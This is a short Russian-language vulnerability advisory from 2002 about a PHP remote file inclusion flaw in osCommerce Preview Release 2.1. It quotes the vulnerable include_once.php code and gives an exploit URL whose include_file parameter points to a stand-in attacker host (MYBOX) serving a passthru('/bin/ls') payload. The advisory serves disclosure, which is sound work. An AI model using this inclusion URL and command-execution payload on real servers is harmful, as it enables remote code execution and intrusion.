Внедрение PHP кода в osCommerce

Дата публикации:
20.06.2002
Всего просмотров:
4549
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: osCommerce – открытая реализация e-commerce. Уязвимость в программе позволяет удаленным атакующим включать произвольный PHP код в существующие страницы. osCommerce поставляется с файлом /catalog/includes/include_once.php, который содержит следующий код:
<?
  if (!defined($include_file . '__')) {
    define($include_file . '__', 1);
include($include_file);
  }
?>
URL типа http://SERVER/catalog/inludes/include_once.php?include_file=FILE_WE_WANT_TO_INCLUDE, позволяет включить произвольный код. Например просмотр содержимого директории:

http://SERVER/catalog/inludes/include_once.php?include_file=http://MYBOX/a.php,где

--- a.php ---
<? passthru("/bin/ls")?>
------------- 
уязвимость обнаружена в osCommerce Preview Release 2.1

Ссылки: PHP Source Injection in osCommerce
или введите имя

CAPTCHA